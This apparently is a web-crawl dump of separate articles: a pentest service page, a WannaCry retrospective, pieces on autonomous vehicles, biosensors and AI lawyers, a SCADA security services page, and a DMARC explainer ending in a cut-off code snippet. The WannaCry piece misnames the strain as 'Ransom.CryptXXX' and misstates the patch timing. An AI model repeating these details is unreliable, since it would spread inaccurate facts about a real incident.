In this phase, the tester will interact with the target will use technical tools to gather further intelligence about the target. Pen tester will scan the website or system for vulnerabilities and weaknesses using the automated scanner that they can later exploit for the targeted attack.
Once the vulnerabilities and entry points have been identified, the pen tester begins to exploit the vulnerabilities typically by escalating privileges, stealing data, intercepting traffic, etc., to gain access. The ethical hacker will identify the ones that are exploitable enough to provide access to the target system.
The pen tester should ensure the gained access to the target is persistent. This kind of persistence is used by the attacker not to get caught while using the host environment for months in order to steal an organization’s sensitive data.
Report & Analysis:
Reporting is often the most critical aspect of the pentest. It will start with the overall testing procedures, followed by an analysis of vulnerabilities, risks and recommendations to mitigate. The findings and detailed description in the report helps you insights and opportunities to improve the security posture.
2. Types of Penetration testing
There is a wide variety of penetration testing and it can be categorized on the basis of either, the knowledge of the target or the position of the pentester. Each of the test option providing information that can dramatically improve the security posture of the organization.
Internal & External penetration testing:
If the test is conducted inside the network it is known as internal penetration testing and if it happens outside the network which is exposed to the internet then it is known as external penetration testing. It aims to find the vulnerabilities in the network infrastructure of the organization. The tester will be conducting firewall config test, firewall bypass test, DNS level attacks, IPS deception etc,.
Web Application penetration testing:
It comprehensively assess web applications for security vulnerabilities that can lead to unauthorized access. The pentester will leverage the OWASP security verification standard and testing methodologies. This test examines the endpoints of each web apps that a user might have to interact on a regular basis, so it needs to be well planned and time investment.
Mobile Application testing:
Mobile and mobile apps can be vulnerable and there might be a chance of data leakage. This test comprehensively assess the mobile and installed mobile applications in any platform (iOS, Android, windows, etc,) for security vulnerabilities. The tester will go beyond the looking at just API and web vulnerabilities to examine the risk.
It is designed to test employees adherence to security policies and security practices defined by the organization. It will uncover the vulnerabilities among employees in both remote test and physical tests.
Wireless Technology Assessment:
This test intends to assess the security of your deployed wireless devices in the client site. Usually, the test happens in the customer end. The hardware used to run pen tests need to be connected with the wireless systems for exposing vulnerability.
Embedded & IoT penetration testing:
It is to assess the security of your IoT and embedded devices by attempting to exploit the firmware, controlling the device or modifying the data sent from the device. In traditional pen testing the tester uses the windows or linux known as TCP/UDP protocols and applications. But when you switch to IoT, you have new architectures like ARM, MIPS, SuperH, PowerPC, etc,
3. Why us?
InfySEC's Penetration Testing company help Small and Medium Sized businesses quickly assess the security posture of their networks by safely identifying network and Application level vulnerabilities before they are actually exploited by attackers. InfySEC's security consultants use real-world scenarios to demonstrate the exploitation and how attackers can crack in to gain access confidential data, networks, systems etc., that impact the business functioning of the organization. We have an innovative set of way in which we carry out the penetration process. Need our help? Fill out the enquiry form or you call us now. | <urn:uuid:62f88367-7d61-4566-992c-43446af39aa1> | CC-MAIN-2022-40 | https://www.infysec.com/services/security-and-defense/penetration-testing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00355.warc.gz | en | 0.922646 | 1,197 | 3 | 3 |
WannaCry Ransomware Anniversary: What we know, Where we are
This time last year IT teams across the globe were working to mitigate the damage of the WannaCry ransomware attack by deploying patches, disabling SMBv1 and recovering files. On this anniversary, it is worth a reminder of the damage caused and how to avoid ransomware risks today.
What was the WannaCry Ransomware?
In May 2017, a new strain of the Ransom.CryptXXX (WannaCry) ransomware began spreading globally, affecting a large number of organizations. WannaCry encrypted data files and asked users to pay a ransom in bitcoins. The ransom note indicated that the payment amount would be doubled after three days. If payment was not made after seven days, the encrypted files would be deleted.
It was later learned that the bitcoin accounts were abandoned, and there never was an automated decryption process, so paying the ransom was pointless. Recovery from backups was, and typically is with ransomware, the best course of action.
How Did WannaCry Spread?
WannaCry had the ability to spread itself within corporate networks, without user interaction, by exploiting a known vulnerability at the time in Microsoft Windows. Computers which did not have the latest Windows security updates applied were at risk of infection.
According to Microsoft, “A month prior, on March 14 , Microsoft had released a security update to patch this vulnerability and protect our customers. While this protected newer Windows systems and computers that had enabled Windows Update to apply this latest update, many computers remained unpatched globally. As a result, hospitals, businesses, governments, and computers at homes were affected.”
How was WannaCry Stopped?
At the time, applying the most recent Microsoft patches to environments helped protect computers from WannaCry infections. Another immediate remediation plan was to disable the specific system protocol known as SMBv1 to mitigate the risk of infection in relation to WannaCry.
Lessons Learned from WannaCry?
Here are a few we can share:
Backups Enable Ransomware Recovery: In ransomware situations, backups (Eze Vault) are the only way to recover files from an attack. With WannaCry, there was no automated decryption process, so even if the ransom was paid files are not returned/decrypted.
Firms must conduct regular backups and test them to ensure a seamless and proper restore is possible.
Patch + System Updates are Critical: As Brad Smith, president of Microsoft, wrote, “As cybercriminals become more sophisticated, there is simply no way for customers to protect themselves against threats unless they update their systems. Otherwise they’re literally fighting the problems of the present with tools from the past.”
Firms should have a plan or patch management program to help ensure patches are applied in a timely manner.
Old Technology Can Be Dangerous: Helping WannaCry spread was outdated technology, including computers running the 16-year old operating system Windows XP (end of support: April 2014). As Smith noted, “It's worth remembering that Windows XP not only came out six years before first iPhone. It came out two months before the very first iPod.”
As WannaCry showed us, the risk of using legacy technology largely outweighs the benefits. By not upgrading, firms are potentially risking everything. As patches and bug fixes are no longer being provided, hackers have an unguarded entrance to access a firm’s environment. This not only increases the firm’s odds of being hacked, but also raises the gravity of ensuing damages should an incident occur. | <urn:uuid:07400ec6-55e8-4bae-abf9-4507c2f24155> | CC-MAIN-2022-40 | https://www.eci.com/blog/15941-wannacry-ransomware-anniversary-what-we-know-where-we-are.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00355.warc.gz | en | 0.955437 | 745 | 2.6875 | 3 |
Autonomous vehicles offer the potential for making streets safer, but currently face regulatory and safety challenges of their own.
Autonomous vehicles and drones have almost fully proven their potential value in various military uses, first in detailed simulated environments and more recently in real-world tests. They are even able to operate in swarms now, using sophisticated artificial intelligence to not only avoid running into each other, but to share workloads and quickly complete complex tasks.
But they are still a long way to becoming commonplace on residential and city streets. A lot of that is because if a drone messes up on the battlefield, there is little chance that any friendly troops will be injured. They are normally operating far from people, or even in contested territory held by an enemy. But if a self-driving car blows through a stoplight or veers off onto the sidewalk of a crowded city street, the results could be tragic, not just for its passengers, but also for everyone around it. So those of us who dream of being driven to work by our vehicles every morning, or having them scoot us back home in the evening while we nap, will have to wait a bit longer for that to happen.
Ironically, the potential for autonomous vehicles to make streets safer was cited as a key reason why The House Transportation Subcommittee on Highways and Infrastructure held a hearing last week on the use of automated vehicles. Entitled “The Road Ahead for Automated Vehicles,” the hearing featured testimony from state and local officials, industry representatives and safety organizations.
The hearing comes as the National Highway Traffic Safety Administration released a report with some sobering statistics about a spike in serious accidents across the country. According to the report, there were 31,720 vehicle fatalities in the first nine months of 2021, which was 12% more than in 2020 and the highest number of deaths on the road since 2006. Autonomous vehicles operating safely could drastically cut those numbers, although most committee members seemed skeptical that the technology was anywhere near being ready for mass deployment.
“We have seen disastrous consequences when automation technology is deployed haphazardly,” said Del. Eleanor Holmes Norton, chair of the subcommittee. “To maximize the road safety impact of AVs, we must ensure that these technologies are held to the highest possible safety standards.”
Norton may have been referring to a slew of bad news for the autonomous vehicle industry over the past couple weeks. First we got word that Tesla was recalling over 50,000 vehicles for running stop signs. But that followed news from one of Tesla’s primary beta testers, a man named Taylor Ogan, who shared footage of his Tesla on Twitter narrowly missing a delivery truck and almost veering into a roadside barrier while trying to navigate a series of busy streets. And finally, there were also reports of hundreds of incidents where autonomous vehicles were traveling at high speeds and then suddenly applied their brakes for no apparent reason. So it’s been a relatively bad time for testing autonomous vehicles.
Ariel Wolf, general counsel for the Autonomous Vehicle Industry Association, which represents Ford, Waymo, Lyft, Volvo, Uber and others, stressed that autonomous vehicles have the potential to make roadways much safer compared with having all human drivers. He also said that once autonomous vehicles were commonplace, that the average household could save an average of $5,600 per year on transportation costs. However, his vision requires that those households rely on shared fleets of autonomous vehicles, which may not be realistic in car-loving America.
Interestingly, most of the speakers agreed that one of the biggest drawbacks to autonomous vehicle deployment was a lack of federal regulations to govern the safety and legality of operating self-driving cars. Instead, vehicles must comply with state laws, so it’s quite possible that a self-driving vehicle operating in one state could suddenly become illegal when it crosses into another.
Iowa Department of Transportation Director Scott Marler, speaking on behalf of the American Association of State Highway and Transportation Officials, explained why the federal government needed to set unified policies that both states and industry could follow.
“It is vitally important that the federal government and specifically the USDOT [United States Department of Transportation] continue to join in supporting these national, regional, state and local efforts,” Marler said. “The federal government and the USDOT are uniquely positioned to facilitate and sustain a technically informed and objective collaboration effort. Federal leadership can ensure national consistency in systems engineering and architecture to guarantee interoperability and standardized levels of safety across state lines.”
If a national strategy governing the laws and regulations for autonomous vehicles could be hashed out, then speakers said that many of the local success stories regarding smart cars and delivery vehicles could start to spread across the country. One such story was shared by Martha Castex-Tatum, vice mayor pro tem and council member for District K in Houston, Texas.
In Houston, they have been using smaller autonomous and electric vehicles designed by Nuro, a company founded in 2016 that focuses on delivery vehicles and self-driving robots. Castex-Tatum said that the vehicles were a double win for her city because they can be operated safely using automation, and eliminate the need for more gas-powered vehicles on city streets.
“Houston is one of the first cities to see AVs conducting commercial delivery service, with the deployment of Nuro’s zero-occupant, electric AVs, and I am glad that my own District K was one of the first three zip codes where service launched,” Castex-Tatum said. “These vehicles are offering our residents more zero-emission options with lower speeds and smaller, lightweight vehicles. Since 2019, Nuro has delivered groceries, prescriptions and hot food in partnership with Kroger’s, Domino’s, CVS and the Houston Food Bank.”
The hearing, and especially the latest roadside fatality statistics, really hit home for me. Back when I had to make a long commute to work, I unfortunately got to see a lot of bad accidents involving tractor trailers, passenger vans, motorcycles, cars, buses and everything else. I narrowly missed out on becoming entangled in a major pile up on the American Legion Bridge that unfolded at full highway speeds about two car lengths behind me—and provided quite the early morning scare. I also escaped several minor near misses where drivers were not paying attention when changing lanes, or were too distracted to notice that traffic ahead of them (where I was sitting) had slowed to a stop.
Back when I was just starting out as a journalist, racing to the scene of bad and fatal accidents to collect information and take photos was part of my beat. Those accident photos were oddly popular and often landed on the front page, but it was a soul draining assignment. So yes, I have seen the danger that human error can cause when driving, which is why I have no reason to doubt the latest NHTSA statistics. I look forward to the day when people can have their vehicles safely take them wherever they need to go. I have no illusions that something like that will happen anytime soon, but if unified federal laws and guidance can speed up the process, then it’s something that we should all support.
John Breeden II is an award-winning journalist and reviewer with over 20 years of experience covering technology. He is the CEO of the Tech Writers Bureau, a group that creates technological thought leadership content for organizations of all sizes. Twitter: @LabGuys | <urn:uuid:4ca55874-ac6a-48b1-bc7f-ef71fc347bd5> | CC-MAIN-2022-40 | https://www.nextgov.com/emerging-tech/2022/02/could-smart-cars-finally-be-driving-towards-reality/361652/?oref=ng-next-story | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00355.warc.gz | en | 0.970004 | 1,531 | 2.796875 | 3 |
The rapid growth of biosensor technology can be attributed in large part to the healthcare industry. Biosensors have been used by hospitals for years to monitor patient status. These IoT devices monitor biological functions, giving doctors and patients insightful data for analysis.
Another advantage to biosensors is that they facilitate minimal invasiveness for measuring biological activity, such as blood oxygen levels. And what makes biosensors incredibly essential is that they can deliver a wealth of valuable biological information in real-time.
However, while a large segment of the biosensor technology market is in healthcare, other applications include wellness and fitness. In the works are color tattoos that measure blood sugar. Some of the many ailments detected by biosensors include sleep apnea, peripheral artery disease, and obstructive pulmonary disease.
Part of the mystique of biosensors is their ability to collect tremendous data for actionable medical analysis. These highly sensitive devices collect data at the molecular level, as certain molecules are linked to illnesses. Biosensors can also help doctors diagnose a patient's symptoms at a much faster rate than traditional methods. The main components of a biosensor are sensor, transducer, and electrons.
Healthcare and Biosensors
Developers of biosensors have put a strong focus on creating improvements for the healthcare industry. Hospitals have multiple uses for the technology, as it can monitor blood pressure, glucose levels, and heart rate. The technology is also useful for doctors conducting real-time diagnostic tests on patients.
Another feature of biosensors is how they integrate with digital pills. The patient digests the pill, which is then activated by stomach acid. Gilead has designed such a pill for HIV medication. Once ingested, the patient is notified on their smartphone, and the biosensors transmit that information to the cloud.
Digital pills can also monitor mental illness, as well as physical conditions. Otsuka Pharmaceutical has developed a digital pill to monitor depression, bipolar disorder, and schizophrenia.
Data Collection on Patients
The wide range of data biosensors capable of collecting data on patients has facilitated the adoption of wearable smart technology by healthcare organizations. Additionally, medical patches placed on a patient’s body can detect biological data, such as skin temperature and respiratory measurements.
Home Monitoring Kits
In recent years, home monitoring kits have been booming for biosensor manufacturers. These kits allow patients to self-monitor themselves on a daily basis. Diabetics, for example, use the kit to monitor glucose levels. The more information collected daily, the faster doctors can treat a patient's condition. Manufacturers are working on meeting the demand for smaller, less expensive, and more user-friendly biosensors for home use.
Home-monitoring is possible for many diseases, including cancer. It can even be used to help doctors ensure patients are taking their medication on schedule. Studies show about half of patients with chronic illnesses fail to follow their doctor's instructions, which can worsen health.
The Eventual Omnipresence of Biosensors
Growing demand among hospitals and patients for biosensors will likely make the technology available at a high percentage of medical facilities in the not-so-distant future. As biosensors continue to play a role in making healthcare more personalized, they will bring considerable improvements to the patient experience.
Smart devices of the future will include T-shirts that monitor multiple health parameters at once and deliver the gathered data through a phone app. Another new development on the horizon is a biosensor that measures drug concentration in blood or saliva. Doctors will help influence new biosensor developments by providing input to MedTech companies on the type of metrics they need to fine-tune diagnostic tests. | <urn:uuid:843809e1-edac-4155-8236-3bfaa77b6bae> | CC-MAIN-2022-40 | https://iotmktg.com/how-biosensor-technology-shapes-modern-healthcare/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00355.warc.gz | en | 0.930777 | 764 | 3.203125 | 3 |
Over the years, machines have replaced humans to handle predictable tasks. Tasks like collecting money at toll booths, managing customer service calls, and even vacuuming your living room floor can now be completed by a machine. But so far, machines have left humans to take on unpredictable tasks that require creativity, problem-solving, and intuition based on human experiences.
As machines have become a part of everyday life, some folks have reasoned that robots could never replace what they do. I hate to break it to you, but artificial intelligence (AI) is now creating art and tech companies are raising millions to advance AI-powered solutions for symptom analysis and patient triage.
So, is it possible for AI to replace lawyers?
Today, machines have learned to carry out tasks we could hardly imagine 20 years ago. AI uses statistical patterns in data to improve the efficiency of many different work processes. All AI needs is data, and there’s plenty of it available in the legal field.
It is possible that AI will optimize the legal field and reduce the number of errors in cases. It is possible that human lawyers take on an overseer’s role and only problem-solve when things go wrong.
I’ve thought about this possibility a lot in my work creating an AI-powered immigration law chatbot. Most lawyers I’ve talked to about this think it’s impossible for AI to fully replace human lawyers, or that that moment is impossibly far off in the future. But why are lawyers so convinced that they can’t be replaced?
Psychology plays a role in our reluctance to accept robots
It could be the uncanny valley effect, which is the uneasy feeling you get when a non-human form such as an avatar, robot, or animation is just a little too realistic and lifelike. It’s called a valley because on one hill is cartoon-ish animation that is clearly non-human, like Fred Flintstone. On the other hill is a real-life human, or an AI Instagram model so lifelike that people are fooled into thinking it’s truly human.
In the middle is the uncanny valley. A good example of the uncanny valley is the creepy baby Billy in the short, animated film, Tin Toy, produced by Pixar in 1988. Another example is the 2009 computer-animated adaptation of Charles Dickens’s A Christmas Carol which was described as creepy and off-putting by critics.
The chasm between looking “almost human” and “fully human” leaves people feeling a sense of unease, strangeness, disgust, or creepiness. It is possible that human lawyers feel a sense of revulsion thinking about an AI lawyer taking their place.
It’s also possible that AI is taking too long to successfully complete the complex tasks required to be a good lawyer. This idea, that technology was advancing but then was just not good enough for a long time, is called the trough of disillusionment.
What is the trough of disillusionment?
Here’s the story behind it. Gartner, a technology research and consulting company, created what’s called the hype cycle to track emerging technologies. The hype cycle has five key phases and shows us how a technology or application will evolve over time. At one end of the hype cycle is the Innovation Trigger where potential technology breakthroughs start. At the other end is the Plateau of Productivity where mainstream adoption starts to take off
Somewhere in the middle is the Trough of Disillusionment. Lawyers see what AI has done in other fields, but implementations in the legal field have failed to deliver. The improvement of existing tech has stalled, and new tech isn’t readily available. Simply put, lawyers are unimpressed and think that legal tech has hit its limits.
Are the disillusioned lawyers with the creepy uncanny feeling right about the future of AI in the legal field? It’s possible, but there are a couple of things to consider before we write off robot lawyers for good.
AI lacks intuition to make decisions about the unknown
Machines are designed to strictly follow rules, they simply don’t have the intuition that humans use to make logical leaps. Human lawyers rely on experience and intuition to solve unknown problems and can make decisions. This is something computers can’t do right now, but that doesn’t mean it’s impossible.
When humans have incomplete knowledge, we make decisions based on intuition. Strong intuition is an admired trait in humans, but we’re often unsettled at the idea of a machine that can use intuition or less than complete data to make a decision.
Computers process enormous amounts of data to function. Given the right kind of data, it is possible that AI can actually make highly intuitive decisions. AI has no bias so it can make decisions based on every minute detail, observation, and influence. In fact, there are people who believe that it’s possible to train AI to make more intuitive decisions, and there are researchers at Aarhus University currently trying to combine our human intuition with an AI’s ability to quickly access troves of information.
Machines have been replacing human workers for centuries
While some believe that it’s impossible for AI to gain the human-like intuition needed to be a good lawyer, others think it’s simply impossible. I hate to be the bearer of bad news, but not too long ago, people thought it’d be impossible to replace the horse.
For centuries, horses were the backbone of modern civilization. Horses stayed in the labor force through many new technologies that threatened their standing. For example, telegraphs replaced long-distance delivery men on horseback and trains replaced cross country horse-drawn carriages. And still, horses did work on farms and hauled people around cities.
That is until the internal combustion engine hit the scene, and suddenly millions of American horses were unemployed.
Machines have also replaced humans over the decades. Buttons replaced elevator operators and the internet drove travel agencies out of business. Between 1990 and 2007, approximately 400,000 US factory jobs were lost to automation.
If you’re a lawyer you might be thinking, “A machine couldn’t do my job.” Well, don’t be so certain. And that’s coming from a lawyer.
AI is the ultimate student. With help from data – good data and lots of it – AI can carefully study how behaviors and contextual inputs result in progress towards a goal. AI runs millions upon millions of simulations to get very good at a particular task, and when taught correctly, AI can get good at just about anything you tell it to get good at. Including legal work.
The future of AI-powered lawyers may be closer than we think
According to a paper written by economists at MIT and Boston University, robots could replace about two million workers by 2025. While many of these lost jobs are in manufacturing and other jobs that inherently require more repetitive, linear tasks, it’s not outside the realm of possibility that AI continues to creep into the legal profession.
For now, human intelligence and artificial intelligence have one major difference — the why. AI can easily learn how anything can be done better than humans. But AI still doesn’t have the curiosity to ask “why,” which prevents machines from doing the most meaningful legal work. That isn’t to say curiosity isn’t in AI’s future.
I have long been interested in the use of artificial intelligence in the legal field. I combined my passion for the law and AI into the creation of a bilingual AI-powered immigration law chatbot, YoTengoBot. If you want to discuss the future of AI in the legal profession, let’s connect! If you’d like to learn more about what I’m building with AI and the law, check out YoTengoBot! | <urn:uuid:80236396-77e3-43fc-99ca-222c61b8c2ca> | CC-MAIN-2022-40 | https://www.ciocoverage.com/lawyers-think-robots-will-never-replace-them-heres-why-they-may-be-wrong/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00355.warc.gz | en | 0.950128 | 1,651 | 2.9375 | 3 |
Supervisory Control and Data Acquisition (SCADA) systems are used for remote monitoring and control in the delivery of essential services/products such as electricity, natural gas, water, waste treatment and transportation. This makes SCADA systems an integral part of a nation’s critical infrastructure. They are also crucial to the continuity of business.
Issues that you need to be aware of when considering SCADA security:
• Recent changes in SCADA systems have exposed them to vulnerabilities that may not have existed before. For example, the switch from leased telecommunications lines to public infrastructure (e.g., public CDMA and GSM networks), the use of commodity computers running commodity software, and the move from proprietary to open standards have all introduced new vulnerabilities into SCADA systems.
• Effective network design, providing the appropriate degree of segmentation between the Internet, the company's corporate network, and the SCADA network, is critical to risk management in modern SCADA systems. Weaknesses in the network architecture can increase the risk of intrusion from the Internet and other sources.
• Most SCADA protocols provide no mechanism for confidentiality of communications. If the lower-level protocols do not provide confidentiality either, SCADA transactions travel "in the clear," meaning that intercepted communications can be easily read.
• Many SCADA systems were designed with little regard for security, often lacking the memory and bandwidth for sophisticated password or authentication systems. As a result, there is no mechanism to determine a user’s identity or whether that user is authorized to access the system. This allows the injection of false requests or replies into the SCADA system.
• SCADA systems often lack a session structure, which, combined with the lack of authentication, allows erroneous or rogue requests or replies to be injected into the system without any prior knowledge of what has gone on before.
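Native SCADA protocols rarely offer these protections, but they can sometimes be retrofitted at the application layer. The sketch below is a generic illustration, not tied to any real SCADA protocol, of how a pre-shared key, an HMAC tag, and a monotonically increasing sequence number can reject forged and replayed requests; all names and the frame layout are invented for this example.

```python
import hmac
import hashlib
import struct

SHARED_KEY = b"demo-key-distributed-out-of-band"  # hypothetical pre-shared key

def sign_request(seq: int, payload: bytes, key: bytes = SHARED_KEY) -> bytes:
    """Frame = 8-byte big-endian sequence number + payload + 32-byte HMAC-SHA256 tag."""
    body = struct.pack(">Q", seq) + payload
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return body + tag

def verify_request(frame: bytes, last_seq: int, key: bytes = SHARED_KEY):
    """Return (seq, payload) if the tag is valid and seq is fresh; raise otherwise."""
    body, tag = frame[:-32], frame[-32:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("bad HMAC: message forged or corrupted")
    seq = struct.unpack(">Q", body[:8])[0]
    if seq <= last_seq:
        raise ValueError("stale sequence number: possible replay")
    return seq, body[8:]
```

The HMAC defeats blind injection of forged frames, and the sequence check defeats replay of previously captured ones; a real deployment would also need key management and transport encryption.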
The threat of electronic or physical attacks on SCADA systems could come from a number of different sources. Following are some examples of threat sources:
• insider attack from employees or ex-employees who are disgruntled or for any other reason are a possible security threat;
• organized crime may be driven by financial incentive to penetrate SCADA systems;
• genuine mistakes made as a result of lack of training, carelessness or an oversight;
• terrorists who may be seeking to add electronic attack to their existing capabilities;
• generic Internet threats such as worms, trojans and viruses that infect systems on the Internet can also affect SCADA systems when they use the same software and protocols. This may not be the result of a deliberate attack; SCADA systems may be infected merely because they can be;
• recreational hackers, crackers and virus writers motivated primarily by the challenge and a fascination with technology;
• script kiddies who are primarily untrained yet have hostile or thrill-seeking intentions towards almost anything connected to the Internet;
• activists conducting publicity-seeking attacks; and
• corporate attackers that spy on competitors to gain a competitive advantage.
Scada-security.com has designed a specialized security offering for the SCADA/process control environment. Our offering includes Penetration Testing, Risk Assessment Services and Risk Mitigation Technology.
Penetration Testing - The only way to know for sure how your network will perform under attack is to actually attack it. Scada-security.com’s team of certified security experts will launch controlled, non-intrusive, simulated attacks against your designated network segments and prepare a report detailing what holes were found, how they were exploited, how much of a threat they pose, and suggestions on how to fix them.
How does a penetration test work?
A penetration test starts with a large amount of research. Any data about your company and employees we are able to find will then be used to more effectively plan and execute attacks on your network. The next step in the test is to scan and footprint the network. Once we have gathered an appropriate amount of data, we begin attacking your network using many of the same tools that malicious hackers use. All research, footprinting, and attacking will start in a very quiet way, growing louder and more aggressive as the test progresses. This allows us to gauge what kinds of attacks your network will block, and which it will allow. By the end of the test, we will have collected enough information to prepare a report detailing everything we found, highlighting any points of concern, and how to improve your security.
Unlike some “penetration tests” performed by other security firms, Scada-security.com will go as deep into your network as you want. This makes the test much more realistic and provides a good deal more data about the real state of security throughout your network. In some cases, we will be unable to get beyond the network perimeter (a very good thing). Should this happen, we offer a variety of ways to continue the test via a secure tunnel, allowing us to bypass perimeter security without leaving any holes for attackers.
One of the most popular and difficult-to-secure attack vectors in recent years is the client-side attack. These attacks don’t target the network’s perimeter or any of its services, but instead target your end users. Statistically, even with good training and good perimeter defenses, these attacks will succeed a significant amount of the time.
Internal Penetration Testing.
The goal of an Internal Penetration Test is to simulate an attack by someone inside the organization. This attacker could be anyone who has access to any building or network in your organization. Typically, an organization’s network is weakest on the inside, precisely where these attackers will be. Our security experts will carry out such an attack, mainly targeting access control systems, wireless networks, and, optionally, physical security. In the end, you will know how an attacker would exploit the systems in your organization.
External Penetration Testing. An External Penetration Test aims to simulate an attacker outside your organization, who is also usually in a remote location. Such attackers may be malicious hackers from a few miles away, or a few continents away.
Custom Penetration Testing. If your needs are more specific than either of the above offerings, we would still like to help. Scada-security.com will work with you to test a specific system or set of systems. A good example of this is a new installation of IDS/IPS systems. In order to be useful, they need to be tuned, and tuning these systems can be difficult. It’s even more difficult without controlled attack traffic to reference. Scada-security can assist in this and many other situations. Contact us to see how we can help you.
Attaining a good security stance is never easy, but it is much more difficult when you don’t know where you currently are. A Vulnerability Assessment will help nail down exactly which areas are weak and where to devote resources. Scada-security’s team of certified security experts can cover your organization from top to bottom, or only the areas you feel need help.
One of the newer risks to sensitive networks is the proliferation of cheap and easy-to-use wireless devices. Many times, people will bring in these unauthorized devices and attach them to the network without anyone knowing. And, without proper security settings (which are never there by default and rarely applied), they open the internal network to anyone within several miles. Even laptops with built-in wireless capability can be a threat when attached to your network. Scada-security’s team will find any rogue devices in your area and alert you to their presence.
Having strong security measures on the perimeter of your network is only the first step to having a good security stance. The best methodology is “defense in depth,” which says that any secure system should have good security measures in place throughout the system, not just in selected places. While most attackers are located outside your network, many attacks are actually executed from inside of vulnerable networks, where there are generally fewer defenses. Scada-security.com can perform scans of your internal networks to find any weak points and help eliminate them.
The perimeter of your network is the first line of defense against a world full of malicious hackers. The devices that make up the perimeter are often difficult to configure and rarely installed correctly. Scada-security will perform a scan of your network’s front line to verify the proper functionality of the devices. These scans are able to be performed as a single event, or as part of an ongoing verification of your network’s security.
At the core of every good security program is a well-written and current policy. The policy should drive all other parts of the security process, including technology purchases and implementations. A good policy will be a useful tool instead of a hindrance, allowing for easy fixes to existing problems, and preventing new problems from occurring. Scada-security.com can help you write a new policy, or shape up your existing policy.
Consulting - If your organization has security needs above and beyond our defined services, we offer consulting at an hourly rate. Contact us and let us know how we can help make your organization more secure.
Learn Why It’s Important to Add DMARC Records for Your Business Domain
A DMARC record is a systematic email authentication tool that restricts unauthorized use of an organization’s domain to send email. It allows only genuine senders, protecting stakeholders from spoofing and phishing attempts by malicious actors.
DMARC, or Domain-based Message Authentication, Reporting, and Conformance, is a free, open technical specification for email authentication. It is an email security tool used to protect a domain and authenticate email using the DKIM (DomainKeys Identified Mail) and SPF (Sender Policy Framework) mechanisms. It enables any domain owner to secure their business email and websites and to protect their customers and other stakeholders from threats such as spoofing, phishing, and business email compromise attacks. The DMARC authentication method is deployed using a DMARC TXT record.
Implementation and Implications of a DMARC Record
It is crucial to understand what a DMARC record is before attempting a standard DMARC implementation. A DMARC record consists of a predefined set of rules constituting the DMARC authentication setup. DMARC records are published in the Domain Name System (DNS) of the domains that want to use them. This is what a DMARC TXT record looks like:
Example: v=DMARC1; p=none; rua=mailto:firstname.lastname@example.org
The rules, or policies, that domain owners include in the DMARC DNS record apply to all email sent from the domain. The primary purposes of a DMARC record are to identify the senders authorized to mail on the organization’s behalf and to tell the receiving email service provider which policy to apply to messages that fail the DMARC authentication check.
DMARC allows email receivers to authenticate an incoming message and verify whether it is genuine or fake. The authentication result determines the action taken: deliver the message, block it, or send it to the junk folder. This makes it easier for Internet Service Providers (ISPs) to identify spammers and malicious actors and prevents customers from being bombarded with malicious, fake, or spam emails. It also gives businesses greater transparency over their mail streams. Platforms such as cPanel, GoDaddy, Cloudflare, and Microsoft Office 365 can be used to add and set up DMARC for your company.
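Under the hood, a published DMARC record is just a semicolon-separated list of tag=value pairs, so parsing one is straightforward. The sketch below assumes the TXT record has already been fetched from DNS (no lookup is performed) and splits it into a dictionary:

```python
def parse_dmarc(record: str) -> dict:
    """Parse a DMARC TXT record like 'v=DMARC1; p=none; rua=mailto:a@b.org'."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        tags[name.strip()] = value.strip()
    # Per the specification, a DMARC record must identify itself as version DMARC1.
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record: must start with v=DMARC1")
    return tags
```

For example, parsing the record shown earlier yields a dict whose `p` tag is `none` and whose `rua` tag carries the reporting address.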
Why Should You Adopt the DMARC System?
There are multiple benefits to adopting the DMARC system for your website. Here are a few:
- Reliability: Having an official DMARC TXT record allows an organization to publish its list of approved parties. This action prevents unwanted and malicious parties from sending unauthorized emails from the organization’s domain.
- Transparency: DMARC reports let the organization know who is sending email from a particular domain. This increases transparency and visibility, resulting in more traffic.
- Security: The email community is constantly updated about emails that fail to get authenticated. A policy for dealing with such messages helps the entire email process become more secure.
What Comprises DMARC Policies?
A DMARC setup gives the organization the ability to define its own policy, specifying how email servers should handle messages that fail DMARC approval. In case of an authentication failure, DMARC applies one of the following three basic policies to the email:
- p=none: This neutral policy takes no action on failed messages and only generates reports. It is used to monitor results and gather DMARC reports in order to analyze the mail flow.
- p=quarantine: Under this policy, messages that fail the DMARC checks are quarantined, typically by delivering them to the recipient's spam or junk folder, from which the user can recover them later if desired. This is helpful when you broadly trust your mail streams but want to hold back anything that fails verification rather than reject it outright.
- p=reject: Under this policy, DMARC rejects and blocks any message that fails authentication. When enforced at the SMTP level, incoming messages bounce immediately upon sending.
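On the receiving side, these three policies reduce to a simple dispatch. The sketch below is a deliberately simplified model (real receivers also weigh identifier alignment details, the pct tag, and local overrides); the function name and return labels are invented for illustration:

```python
def dmarc_disposition(policy: str, spf_aligned: bool, dkim_aligned: bool) -> str:
    """DMARC passes when at least one aligned mechanism (SPF or DKIM) passes;
    otherwise the published policy decides what happens to the message."""
    if spf_aligned or dkim_aligned:
        return "deliver"
    return {"none": "deliver", "quarantine": "junk-folder", "reject": "bounce"}[policy]
```

Note that under p=none a failing message is still delivered, which is why that policy is used purely for monitoring.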
DMARC Record Check
Companies or individuals can use a free DMARC generation tool to create a working DMARC record for a domain. Such tools help you view records, test them, and verify their validity. Checking a DMARC record is a straightforward process: provide the tool with your domain name, and it will display the DMARC record along with other information.
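If you would rather sanity-check a record yourself than rely on an online tool, the core rules are mechanical: the record must begin with the v=DMARC1 tag, and it must carry a p tag set to none, quarantine, or reject. A minimal checker along those lines (a sketch, not a full validator):

```python
def check_dmarc(record: str) -> list:
    """Return a list of problems found in a DMARC record string (empty = looks valid)."""
    problems = []
    parts = [p.strip() for p in record.split(";") if p.strip()]
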